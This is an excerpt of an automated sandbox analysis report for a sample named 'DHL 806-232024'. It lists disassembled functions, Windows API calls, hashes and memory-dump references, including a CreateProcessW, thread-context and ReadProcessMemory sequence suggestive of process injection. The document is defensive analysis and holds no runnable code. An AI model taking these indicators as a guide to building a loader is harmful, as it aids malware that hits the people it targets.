                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                  • String ID:
                                                                                  • API String ID: 1372826849-0
                                                                                  • Opcode ID: 39b2f4bb82a2beb44e32d76131c3710f4c4866a8a18e0f4863e56f5effa96b28
                                                                                  • Instruction ID: 267b43581e772eea058b6edd5e3d877e34e403b5c0fb46bd1f10c6bc069f6265
                                                                                  • Opcode Fuzzy Hash: 39b2f4bb82a2beb44e32d76131c3710f4c4866a8a18e0f4863e56f5effa96b28
                                                                                  • Instruction Fuzzy Hash: 2201C031304A1EEEE6293B38EC52B3E7688FF41731F50002AF704DB181DAB09D019262
                                                                                  APIs
                                                                                  • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,009397D2,?,?,?,?,?,00000004), ref: 00939B45
                                                                                  • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,009397D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00939B5B
                                                                                  • CloseHandle.KERNEL32(00000000,?,009397D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00939B62
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$CloseCreateHandleTime
                                                                                  • String ID:
                                                                                  • API String ID: 3397143404-0
                                                                                  • Opcode ID: d5ad8748ad14edb44c1741664b5ff94e75cb1fd9bd41294965d1635041c41153
                                                                                  • Instruction ID: 0b026bda8733539410518e969beec0e764b9bf90ef25af517d3b6b6320f69753
                                                                                  • Opcode Fuzzy Hash: d5ad8748ad14edb44c1741664b5ff94e75cb1fd9bd41294965d1635041c41153
                                                                                  • Instruction Fuzzy Hash: ACE08632195714B7E7212B55EC09FCA7B28AB05772F104120FB14A90E087B16511A798
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 00938FA5
                                                                                    • Part of subcall function 008F2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,008F9C64), ref: 008F2FA9
                                                                                    • Part of subcall function 008F2F95: GetLastError.KERNEL32(00000000,?,008F9C64), ref: 008F2FBB
                                                                                  • _free.LIBCMT ref: 00938FB6
                                                                                  • _free.LIBCMT ref: 00938FC8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 776569668-0
                                                                                  • Opcode ID: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                                                                                  • Instruction ID: ad82ae1d5211528b9d835c16876d450dd44d75f72b8f842db3b389858b8bccb7
                                                                                  • Opcode Fuzzy Hash: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                                                                                  • Instruction Fuzzy Hash: 79E012A16197055ACA34A57CAD44AA367FEFF48350B18081DB509DB142DE24E8418965
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: CALL
                                                                                  • API String ID: 0-4196123274
                                                                                  • Opcode ID: ccb7e54889b67fd43a59e4cd65e873d152ccdfcbd1d8aa03ea817a4301ae4f36
                                                                                  • Instruction ID: cdf31fe2089048c69eade474f722ff453aa8c019f67305d46835964a9d4e9476
                                                                                  • Opcode Fuzzy Hash: ccb7e54889b67fd43a59e4cd65e873d152ccdfcbd1d8aa03ea817a4301ae4f36
                                                                                  • Instruction Fuzzy Hash: 71224B74608255DFCB28DF14C494B6AB7E1FF84314F158A5EE8868B362DB71ED81CB82
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memmove
                                                                                  • String ID: EA06
                                                                                  • API String ID: 4104443479-3962188686
                                                                                  • Opcode ID: 450c053f2aed7301ffaa68db7297d270528c487fa60db1d0f4d198cb9218a413
                                                                                  • Instruction ID: 49c95feef1d8db1caec158e6706d9cc864da48a63d2e09aadaf40491cdfcfc64
                                                                                  • Opcode Fuzzy Hash: 450c053f2aed7301ffaa68db7297d270528c487fa60db1d0f4d198cb9218a413
                                                                                  • Instruction Fuzzy Hash: 77418031A045587BDF115B68C8517BE7F66FF41324F685277E882DB382C5318D4087E2
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memmove
                                                                                  • String ID:
                                                                                  • API String ID: 4104443479-0
                                                                                  • Opcode ID: 888ce228c65e5e126e2c0d83d6bef63a0f4650b727a1fb86e52d4496ebb79edc
                                                                                  • Instruction ID: 9770681d48f4147fe8cdb0b4cc3702650d66cfd662dbfc51cce1ff0595a5570d
                                                                                  • Opcode Fuzzy Hash: 888ce228c65e5e126e2c0d83d6bef63a0f4650b727a1fb86e52d4496ebb79edc
                                                                                  • Instruction Fuzzy Hash: A53182B261450AAFC714DF68D8D1E69F3A9FF48324715872AE915CB391EB70E850CB90
                                                                                  APIs
                                                                                  • IsThemeActive.UXTHEME ref: 008D4992
                                                                                    • Part of subcall function 008F35AC: __lock.LIBCMT ref: 008F35B2
                                                                                    • Part of subcall function 008F35AC: DecodePointer.KERNEL32(00000001,?,008D49A7,009281BC), ref: 008F35BE
                                                                                    • Part of subcall function 008F35AC: EncodePointer.KERNEL32(?,?,008D49A7,009281BC), ref: 008F35C9
                                                                                    • Part of subcall function 008D4A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 008D4A73
                                                                                    • Part of subcall function 008D4A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 008D4A88
                                                                                    • Part of subcall function 008D3B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 008D3B7A
                                                                                    • Part of subcall function 008D3B4C: IsDebuggerPresent.KERNEL32 ref: 008D3B8C
                                                                                    • Part of subcall function 008D3B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,009962F8,009962E0,?,?), ref: 008D3BFD
                                                                                    • Part of subcall function 008D3B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 008D3C81
                                                                                  • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 008D49D2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                  • String ID:
                                                                                  • API String ID: 1438897964-0
                                                                                  • Opcode ID: 53042549aff3a2d9ac37047317695e162d8a3faf2fd3e1c48f8ab9eae96672c2
                                                                                  • Instruction ID: 0b4c13151cb48ec47527f15a3c0446e44e2bbaf1cf6d82b53466e6cb364d21f8
                                                                                  • Opcode Fuzzy Hash: 53042549aff3a2d9ac37047317695e162d8a3faf2fd3e1c48f8ab9eae96672c2
                                                                                  • Instruction Fuzzy Hash: 661167719283259BC700EF6DE80591AFFE8FB98710F00461BF095C32B2DB709645DB96
                                                                                  APIs
                                                                                    • Part of subcall function 008F594C: __FF_MSGBANNER.LIBCMT ref: 008F5963
                                                                                    • Part of subcall function 008F594C: __NMSG_WRITE.LIBCMT ref: 008F596A
                                                                                    • Part of subcall function 008F594C: RtlAllocateHeap.NTDLL(00E10000,00000000,00000001,00000000,?,?,?,008F1013,?), ref: 008F598F
                                                                                  • std::exception::exception.LIBCMT ref: 008F102C
                                                                                  • __CxxThrowException@8.LIBCMT ref: 008F1041
                                                                                    • Part of subcall function 008F87DB: RaiseException.KERNEL32(?,?,?,0098BAF8,00000000,?,?,?,?,008F1046,?,0098BAF8,?,00000001), ref: 008F8830
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                  • String ID:
                                                                                  • API String ID: 3902256705-0
                                                                                  • Opcode ID: 3c87fdac0f5e377296663bc6637268a89a2478e0f7811c1d7d8515b61c1c8f88
                                                                                  • Instruction ID: f17dee6cb09c5631cc56c86a9667e9efc22fd272c54adccbe2fb37f1ce411f16
                                                                                  • Opcode Fuzzy Hash: 3c87fdac0f5e377296663bc6637268a89a2478e0f7811c1d7d8515b61c1c8f88
                                                                                  • Instruction Fuzzy Hash: E4F0863550471DE6CB24BB78EC159FE77A8FF40351F100415FA04D5691EFB18A808691
                                                                                  APIs
                                                                                    • Part of subcall function 008F8D68: __getptd_noexit.LIBCMT ref: 008F8D68
                                                                                  • __lock_file.LIBCMT ref: 008F561B
                                                                                    • Part of subcall function 008F6E4E: __lock.LIBCMT ref: 008F6E71
                                                                                  • __fclose_nolock.LIBCMT ref: 008F5626
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                  • String ID:
                                                                                  • API String ID: 2800547568-0
                                                                                  • Opcode ID: 283fd6977afd8f2b5d601dbe6c9ae0e727cfd2a1b2f1e0715889c7f9dc4c4c20
                                                                                  • Instruction ID: be5b2b68dfdc3f33d9985655f70bccd93ae7edaa6416f3df4c797a428b5d23ad
                                                                                  • Opcode Fuzzy Hash: 283fd6977afd8f2b5d601dbe6c9ae0e727cfd2a1b2f1e0715889c7f9dc4c4c20
                                                                                  • Instruction Fuzzy Hash: BCF09071900A0CDADB20BF7D880277E67A1FF51734F658209A764EB1C1DF7C89019B56
                                                                                  APIs
                                                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 00E4EA33
                                                                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E4EAC9
                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E4EAEB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2065276175.0000000000E4C000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E4C000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_e4c000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                  • String ID:
                                                                                  • API String ID: 2438371351-0
                                                                                  • Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                                                  • Instruction ID: 199fafd62ec98b1d18a887e07c0f95f875e3450e60f60847aeae82fbedd23272
                                                                                  • Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                                                  • Instruction Fuzzy Hash: 7D12CE24E14658C6EB24DF64D8507DEB232FF68300F10A0E9910DEB7A5E77A4E81CF5A
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: ProtectVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 544645111-0
                                                                                  • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                  • Instruction ID: 5562889b37bb5d786943582350b0b92e021a60243e2d7d11876119b5f1fb0ea0
                                                                                  • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                  • Instruction Fuzzy Hash: D031D370A00109DFC718DF68D480969F7A6FF59300B648AA5E50ACB752DB31EDC1CF90
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClearVariant
                                                                                  • String ID:
                                                                                  • API String ID: 1473721057-0
                                                                                  • Opcode ID: 7009fa98468662d67484f5be488939b75d9dcd9315a79b40589058339a919f41
                                                                                  • Instruction ID: e0075fc5059a4d6eaa9b1fb6484534cbc6a71a32b6a50ab9f7983e88d8af3e77
                                                                                  • Opcode Fuzzy Hash: 7009fa98468662d67484f5be488939b75d9dcd9315a79b40589058339a919f41
                                                                                  • Instruction Fuzzy Hash: 2D412574608345DFDB24DF18C484B1ABBE0FF85318F19899DE8898B362C772E885CB52
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memmove
                                                                                  • String ID:
                                                                                  • API String ID: 4104443479-0
                                                                                  • Opcode ID: 6ee465b42f070a87ab8bdcbdc4f1a5421f4d8a8dba431b986a5974603d4dfe50
                                                                                  • Instruction ID: 36281533c2918d851d05bea37a442cfadc507529b3b213d974baacf409cd1514
                                                                                  • Opcode Fuzzy Hash: 6ee465b42f070a87ab8bdcbdc4f1a5421f4d8a8dba431b986a5974603d4dfe50
                                                                                  • Instruction Fuzzy Hash: EA21213162860DEFDB244F24EC527797BB8FF50350F25856AE486C56D1EB3082A09745
                                                                                  APIs
                                                                                    • Part of subcall function 008D4D13: FreeLibrary.KERNEL32(00000000,?), ref: 008D4D4D
                                                                                    • Part of subcall function 008F548B: __wfsopen.LIBCMT ref: 008F5496
                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,009962F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 008D4F6F
                                                                                    • Part of subcall function 008D4CC8: FreeLibrary.KERNEL32(00000000), ref: 008D4D02
                                                                                    • Part of subcall function 008D4DD0: _memmove.LIBCMT ref: 008D4E1A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Library$Free$Load__wfsopen_memmove
                                                                                  • String ID:
                                                                                  • API String ID: 1396898556-0
                                                                                  • Opcode ID: f4ff276917c3e88e8c98e1920e056c3854d3717c64eac1619895e32ca8b6b07e
                                                                                  • Instruction ID: a08eff7756b824965d64778023d065f4b246f730dc3c8a31c72c390b6f0f3afe
                                                                                  • Opcode Fuzzy Hash: f4ff276917c3e88e8c98e1920e056c3854d3717c64eac1619895e32ca8b6b07e
                                                                                  • Instruction Fuzzy Hash: 1C11E732650709ABCB20FF79DC12B6E77A9EF40711F10852AF541E63C1DEB19A059B92
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClearVariant
                                                                                  • String ID:
                                                                                  • API String ID: 1473721057-0
                                                                                  • Opcode ID: 7574660e0fa8745734c1dfc96dffbd67f7fe2862795c1163028302355a95db96
                                                                                  • Instruction ID: 8e7d18061a56adcc3ca9856fd7c1caba7c0a717b4b91875e59b46bf7adbca41b
                                                                                  • Opcode Fuzzy Hash: 7574660e0fa8745734c1dfc96dffbd67f7fe2862795c1163028302355a95db96
                                                                                  • Instruction Fuzzy Hash: B82124B4608345DFCB28DF24C444A1ABBE0FF88714F158A69E98A87761D771E885CB53
                                                                                  APIs
                                                                                  • __lock_file.LIBCMT ref: 008F4AD6
                                                                                    • Part of subcall function 008F8D68: __getptd_noexit.LIBCMT ref: 008F8D68
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: __getptd_noexit__lock_file
                                                                                  • String ID:
                                                                                  • API String ID: 2597487223-0
                                                                                  • Opcode ID: 351cee4260270f6338280a70cb88a8a6ee4f30eefa5038d83a1715a3e0632510
                                                                                  • Instruction ID: 973550aaf5bb9fc1e293d5f5e1b0aa4f7156bd555fe9d36936fcfa55bdf689c4
                                                                                  • Opcode Fuzzy Hash: 351cee4260270f6338280a70cb88a8a6ee4f30eefa5038d83a1715a3e0632510
                                                                                  • Instruction Fuzzy Hash: B1F08131A4021DDBDF51AF788C063BF3665FF00325F144515B624EA1D1DB788961DB52
                                                                                  APIs
                                                                                  • FreeLibrary.KERNEL32(?,?,009962F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 008D4FDE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeLibrary
                                                                                  • String ID:
                                                                                  • API String ID: 3664257935-0
                                                                                  • Opcode ID: 4b63cdae1eb40ee5132f4d1de347fb9c58d59d9fa6fdf05a03745365832ceedd
                                                                                  • Instruction ID: bf51add0f31b8c99e408a61c20a2c2e96e89ba395975355b0b7093fabbf13274
                                                                                  • Opcode Fuzzy Hash: 4b63cdae1eb40ee5132f4d1de347fb9c58d59d9fa6fdf05a03745365832ceedd
                                                                                  • Instruction Fuzzy Hash: 02F01571509B16CFCB349F64E494822BBE1FF043293209A3EE2D6C2720CB32A844DB41
                                                                                  APIs
                                                                                  • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008F09F4
                                                                                    • Part of subcall function 008D7D2C: _memmove.LIBCMT ref: 008D7D66
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
